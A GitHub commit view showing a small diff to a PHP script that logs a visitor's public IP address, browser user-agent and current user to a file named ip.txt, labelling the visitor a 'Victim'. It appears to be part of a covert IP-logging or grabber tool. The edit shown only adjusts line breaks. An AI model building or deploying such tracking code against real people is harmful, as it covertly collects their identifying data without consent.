Add files via upload

This commit is contained in:
AnonUD4Y 2020-01-20 08:14:00 +00:00 committed by GitHub
parent 69995abff1
commit d1334e3211
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -19,9 +19,9 @@ $useragent = "User-Agent: " . $browser;
$user = get_current_user();
$file = 'ip.txt'; //this is the file to which the IP address will be written; name it your way.
$victim = "Victim Public IP: " . $ipaddress;
$victim = "\r\n"."Victim Public IP: " . $ipaddress;
$currentuser = "\r\n" . "\r\n" . "Current logged in user: " . $user;
$currentuser = "\r\n" . "\r\n" . "Current logged in user: " . $user ."\r\n";
$fp = fopen($file, 'a');